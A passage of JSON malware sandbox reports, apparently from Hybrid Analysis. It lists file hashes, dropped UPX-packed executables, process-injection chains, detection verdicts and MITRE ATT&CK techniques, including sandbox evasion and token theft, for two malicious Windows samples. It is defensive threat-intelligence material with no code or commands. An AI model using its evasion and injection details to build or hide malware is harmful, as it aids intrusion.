external PDB) for MS Windows UPX compressed\"- Location: [C:\\8868006.exe]- [targetUID: 00000000-00003512]\n \"86602.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\86602.exe]- [targetUID: 00000000-00003512]\n \"6266488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6266488.exe]- [targetUID: 00000000-00003380]\n \"htbtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\htbtt.exe]- [targetUID: 00000000-00006132]\n \"bvfpxr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bvfpxr.exe]- [targetUID: 00000000-00006132]\n \"phtdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\phtdn.exe]- [targetUID: 00000000-00002172]\n \"tvvfv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tvvfv.exe]- [targetUID: 00000000-00002172]\n \"rfppdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rfppdt.exe]- [targetUID: 00000000-00002160]\n \"822088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\822088.exe]- [targetUID: 00000000-00002164]\n \"66822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66822.exe]- [targetUID: 00000000-00002164]\n \"444866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\444866.exe]- [targetUID: 00000000-00004248]\n \"088400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\088400.exe]- [targetUID: 00000000-00004408]\n \"04466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04466.exe]- [targetUID: 00000000-00004408]\n \"2466400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2466400.exe]- [targetUID: 00000000-00002268]\n \"88220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\88220.exe]- [targetUID: 00000000-00003556]\n \"22884.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22884.exe]- [targetUID: 00000000-00003556]\n \"80840.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80840.exe]- [targetUID: 00000000-00003968]\n \"62820.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62820.exe]- [targetUID: 00000000-00003968]\n \"028488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\028488.exe]- [targetUID: 00000000-00004388]\n \"2204222.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2204222.exe]- [targetUID: 00000000-00003500]\n \"828882.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\828882.exe]- [targetUID: 00000000-00002492]\n \"44882.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44882.exe]- [targetUID: 00000000-00001976]\n \"82880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82880.exe]- [targetUID: 00000000-00005900]\n \"trxpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trxpd.exe]- [targetUID: 00000000-00005900]\n \"tbhlt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbhlt.exe]- [targetUID: 00000000-00003904]\n \"jdtpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jdtpf.exe]- [targetUID: 00000000-00003904]\n \"trtdln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trtdln.exe]- [targetUID: 00000000-00005924]\n \"8266402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8266402.exe]- [targetUID: 00000000-00004220]\n \"6408002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6408002.exe]- [targetUID: 00000000-00005956]\n \"6042668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6042668.exe]- [targetUID: 00000000-00005956]\n \"0862264.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0862264.exe]- [targetUID: 00000000-00004160]\n \"txphbj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\txphbj.exe]- [targetUID: 00000000-00004160]\n \"rhhbnrn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhhbnrn.exe]- [targetUID: 00000000-00004260]\n \"tdthpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tdthpd.exe]- [targetUID: 00000000-00005932]\n \"rbbttj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbbttj.exe]- [targetUID: 00000000-00005832]\n \"pndnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pndnt.exe]- [targetUID: 00000000-00005856]\n \"202828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\202828.exe]- [targetUID: 00000000-00006096]\n \"22420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22420.exe]- [targetUID: 00000000-00006096]\n \"2668286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2668286.exe]- [targetUID: 00000000-00005996]\n \"2662206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2662206.exe]- [targetUID: 00000000-00005820]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has section name UPX1 with entropy \"7.97244478673\"\n \"xvpdt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hbpvtv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hfxhd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vjdjljv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rffrrb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nvdfbr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"02886.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2086280.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"84862.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xppdbt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0082442.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hvtvd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"djlrn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"86488.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"246648.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xjnvbp.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tjnrdtx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2860666.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"46228.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"226688.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"88406.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0248006.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"08802.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"24440.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has a section named \"UPX0\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has a section named \"UPX1\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has a section named \"UPX2\"\n \"xvpdt.exe\" has a section named \"UPX0\"\n \"xvpdt.exe\" has a section named \"UPX1\"\n \"xvpdt.exe\" has a section named \"UPX2\"\n \"hbpvtv.exe\" has a section named \"UPX0\"\n \"hbpvtv.exe\" has a section named \"UPX1\"\n \"hbpvtv.exe\" has a section named \"UPX2\"\n \"hfxhd.exe\" has a section named \"UPX0\"\n \"hfxhd.exe\" has a section named \"UPX1\"\n \"hfxhd.exe\" has a section named \"UPX2\"\n \"vjdjljv.exe\" has a section named \"UPX0\"\n \"vjdjljv.exe\" has a section named \"UPX1\"\n \"vjdjljv.exe\" has a section named \"UPX2\"\n \"rffrrb.exe\" has a section named \"UPX0\"\n \"rffrrb.exe\" has a section named \"UPX1\"\n \"rffrrb.exe\" has a section named \"UPX2\"\n \"nvdfbr.exe\" has a section named \"UPX0\"\n \"nvdfbr.exe\" has a section named \"UPX1\"\n \"nvdfbr.exe\" has a section named \"UPX2\"\n \"02886.exe\" has a section named \"UPX0\"\n \"02886.exe\" has a section named \"UPX1\"\n \"02886.exe\" has a section named \"UPX2\"\n \"2086280.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" (UID: 00000000-00005820)\n Spawned process \"2662206.exe\" (UID: 00000000-00005996)\n Spawned process \"2668286.exe\" (UID: 00000000-00005980)\n Spawned process \"22420.exe\" (UID: 00000000-00006096)\n Spawned process \"202828.exe\" (UID: 00000000-00005856)\n Spawned process \"pndnt.exe\" (UID: 00000000-00005832)\n Spawned process \"rbbttj.exe\" (UID: 00000000-00004164)\n Spawned process \"tdthpd.exe\" (UID: 00000000-00005932)\n Spawned process \"rhhbnrn.exe\" (UID: 00000000-00004260)\n Spawned process \"txphbj.exe\" (UID: 00000000-00004160)\n Spawned process \"0862264.exe\" (UID: 00000000-00004176)\n Spawned process \"6042668.exe\" (UID: 00000000-00005956)\n Spawned process \"6408002.exe\" (UID: 00000000-00004220)\n Spawned process \"8266402.exe\" (UID: 00000000-00003476)\n Spawned process \"trtdln.exe\" (UID: 00000000-00005924)\n Spawned process \"jdtpf.exe\" (UID: 00000000-00003904)\n Spawned process \"tbhlt.exe\" (UID: 00000000-00003652)\n Spawned process \"trxpd.exe\" (UID: 00000000-00005900)\n Spawned process \"82880.exe\" (UID: 00000000-00001976)\n Spawned process \"44882.exe\" (UID: 00000000-00002492)\n Spawned process \"828882.exe\" (UID: 00000000-00003980)\n Spawned process \"2204222.exe\" (UID: 00000000-00003500)\n Spawned process \"028488.exe\" (UID: 00000000-00004388)\n Spawned process \"62820.exe\" (UID: 00000000-00003968)\n Spawned process \"80840.exe\" (UID: 00000000-00001536)\n Spawned process \"22884.exe\" (UID: 00000000-00003556)\n Spawned process \"88220.exe\" (UID: 00000000-00003420)\n Spawned process \"2466400.exe\" (UID: 00000000-00002268)\n Spawned process \"04466.exe\" (UID: 00000000-00004408)\n Spawned process \"088400.exe\" (UID: 00000000-00004248)\n Spawned process \"444866.exe\" (UID: 00000000-00003564)\n Spawned process \"66822.exe\" (UID: 00000000-00002164)\n Spawned process \"822088.exe\" (UID: 00000000-00003608)\n Spawned process \"rfppdt.exe\" (UID: 00000000-00002160)\n Spawned process \"tvvfv.exe\" (UID: 00000000-00002172)\n Spawned process \"phtdn.exe\" (UID: 00000000-00001200)\n Spawned process \"bvfpxr.exe\" (UID: 00000000-00006132)\n Spawned process \"htbtt.exe\" (UID: 00000000-00006112)\n Spawned process \"6266488.exe\" (UID: 00000000-00003380)\n Spawned process \"86602.exe\" (UID: 00000000-00003512)\n Spawned process \"8868006.exe\" (UID: 00000000-00003204)\n Spawned process \"fttbvhn.exe\" (UID: 00000000-00003200)\n Spawned process \"dbbpb.exe\" (UID: 00000000-00000656)\n Spawned process \"fnhrv.exe\" (UID: 00000000-00003684)\n Spawned process \"jxtxllv.exe\" (UID: 00000000-00001424)\n Spawned process \"xpxpjbf.exe\" (UID: 00000000-00003816)\n Spawned process \"tthvrx.exe\" (UID: 00000000-00003164)\n Spawned process \"rddvv.exe\" (UID: 00000000-00000848)\n Spawned process \"vjtpp.exe\" (UID: 00000000-00001880)\n Spawned process \"tlflpxl.exe\" (UID: 00000000-00000456)\n Spawned process \"ndnvbhn.exe\" (UID: 00000000-00001376)\n Spawned process \"260604.exe\" (UID: 00000000-00000552)\n Spawned process \"086684.exe\" (UID: 00000000-00003156)\n Spawned process \"860486.exe\" (UID: 00000000-00001472)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" wrote 32 bytes to a remote process \"C:\\2662206.exe\" (Handle: 116)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" wrote 52 bytes to a remote process \"C:\\2662206.exe\" (Handle: 116)\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" wrote 4 bytes to a remote process \"C:\\2662206.exe\" (Handle: 116)\n \"2662206.exe\" wrote 32 bytes to a remote process \"C:\\2668286.exe\" (Handle: 116)\n \"2662206.exe\" wrote 52 bytes to a remote process \"C:\\2668286.exe\" (Handle: 116)\n \"2662206.exe\" wrote 4 bytes to a remote process \"C:\\2668286.exe\" (Handle: 116)\n \"2668286.exe\" wrote 32 bytes to a remote process \"C:\\22420.exe\" (Handle: 116)\n \"2668286.exe\" wrote 52 bytes to a remote process \"C:\\22420.exe\" (Handle: 116)\n \"2668286.exe\" wrote 4 bytes to a remote process \"C:\\22420.exe\" (Handle: 116)\n \"22420.exe\" wrote 32 bytes to a remote process \"C:\\202828.exe\" (Handle: 116)\n \"22420.exe\" wrote 52 bytes to a remote process \"C:\\202828.exe\" (Handle: 116)\n \"22420.exe\" wrote 4 bytes to a remote process \"C:\\202828.exe\" (Handle: 116)\n \"202828.exe\" wrote 32 bytes to a remote process \"C:\\pndnt.exe\" (Handle: 116)\n \"202828.exe\" wrote 52 bytes to a remote process \"C:\\pndnt.exe\" (Handle: 116)\n \"202828.exe\" wrote 4 bytes to a remote process \"C:\\pndnt.exe\" (Handle: 116)\n \"pndnt.exe\" wrote 32 bytes to a remote process \"C:\\rbbttj.exe\" (Handle: 68)\n \"pndnt.exe\" wrote 52 bytes to a remote process \"C:\\rbbttj.exe\" (Handle: 68)\n \"pndnt.exe\" wrote 4 bytes to a remote process \"C:\\rbbttj.exe\" (Handle: 68)\n \"rbbttj.exe\" wrote 32 bytes to a remote process \"C:\\tdthpd.exe\" (Handle: 116)\n \"rbbttj.exe\" wrote 52 bytes to a remote process \"C:\\tdthpd.exe\" (Handle: 116)\n \"rbbttj.exe\" wrote 4 bytes to a remote process \"C:\\tdthpd.exe\" (Handle: 116)\n \"tdthpd.exe\" wrote 32 bytes to a remote process \"C:\\rhhbnrn.exe\" (Handle: 116)\n \"tdthpd.exe\" wrote 52 bytes to a remote process \"C:\\rhhbnrn.exe\" (Handle: 116)\n \"tdthpd.exe\" wrote 4 bytes to a remote process \"C:\\rhhbnrn.exe\" (Handle: 116)\n \"rhhbnrn.exe\" wrote 32 bytes to a remote process \"C:\\txphbj.exe\" (Handle: 68)\n \"rhhbnrn.exe\" wrote 52 bytes to a remote process \"C:\\txphbj.exe\" (Handle: 68)\n \"rhhbnrn.exe\" wrote 4 bytes to a remote process \"C:\\txphbj.exe\" (Handle: 68)\n \"txphbj.exe\" wrote 32 bytes to a remote process \"C:\\0862264.exe\" (Handle: 68)\n \"txphbj.exe\" wrote 52 bytes to a remote process \"C:\\0862264.exe\" (Handle: 68)\n \"txphbj.exe\" wrote 4 bytes to a remote process \"C:\\0862264.exe\" (Handle: 68)\n \"0862264.exe\" wrote 32 bytes to a remote process \"C:\\6042668.exe\" (Handle: 68)\n \"0862264.exe\" wrote 52 bytes to a remote process \"C:\\6042668.exe\" (Handle: 68)\n \"0862264.exe\" wrote 4 bytes to a remote process \"C:\\6042668.exe\" (Handle: 68)\n \"6042668.exe\" wrote 32 bytes to a remote process \"C:\\6408002.exe\" (Handle: 72)\n \"6042668.exe\" wrote 52 bytes to a remote process \"C:\\6408002.exe\" (Handle: 72)\n \"6042668.exe\" wrote 4 bytes to a remote process \"C:\\6408002.exe\" (Handle: 72)\n \"6408002.exe\" wrote 32 bytes to a remote process \"C:\\8266402.exe\" (Handle: 68)\n \"6408002.exe\" wrote 52 bytes to a remote process \"C:\\8266402.exe\" (Handle: 68)\n \"6408002.exe\" wrote 4 bytes to a remote process \"C:\\8266402.exe\" (Handle: 68)\n \"8266402.exe\" wrote 32 bytes to a remote process \"C:\\trtdln.exe\" (Handle: 68)\n \"8266402.exe\" wrote 52 bytes to a remote process \"C:\\trtdln.exe\" (Handle: 68)\n \"8266402.exe\" wrote 4 bytes to a remote process \"C:\\trtdln.exe\" (Handle: 68)\n \"trtdln.exe\" wrote 32 bytes to a remote process \"C:\\jdtpf.exe\" (Handle: 116)\n \"trtdln.exe\" wrote 52 bytes to a remote process \"C:\\jdtpf.exe\" (Handle: 116)\n \"trtdln.exe\" wrote 4 bytes to a remote process \"C:\\jdtpf.exe\" (Handle: 116)\n \"jdtpf.exe\" wrote 32 bytes to a remote process \"C:\\tbhlt.exe\" (Handle: 68)\n \"jdtpf.exe\" wrote 52 bytes to a remote process \"C:\\tbhlt.exe\" (Handle: 68)\n \"jdtpf.exe\" wrote 4 bytes to a remote process \"C:\\tbhlt.exe\" (Handle: 68)\n \"tbhlt.exe\" wrote 32 bytes to a remote process \"C:\\trxpd.exe\" (Handle: 116)\n \"tbhlt.exe\" wrote 52 bytes to a remote process \"C:\\trxpd.exe\" (Handle: 116)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c
https://hybrid-analysis.com/sample/8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c
Hybrid Analysis - Infostealers
{"size": 17818630, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c", "sha256": "8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c", "av_detect": 85, "vx_family": "Lazy.Generic", "threat_score": 80, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 82, "extracted_files": [{"name": "dism.log", "file_size": 273956, "sha256": "998a71275ae264f9e601fb3b6b8edf2b53944585b720a1794a3d14835f819a9d", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "runtime_process": "8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe (PID: 3852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A47DCC.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe (PID: 3852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00003852", "name": "8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe", "normalized_path": "C:\\8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c.exe", "sha256": "8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", 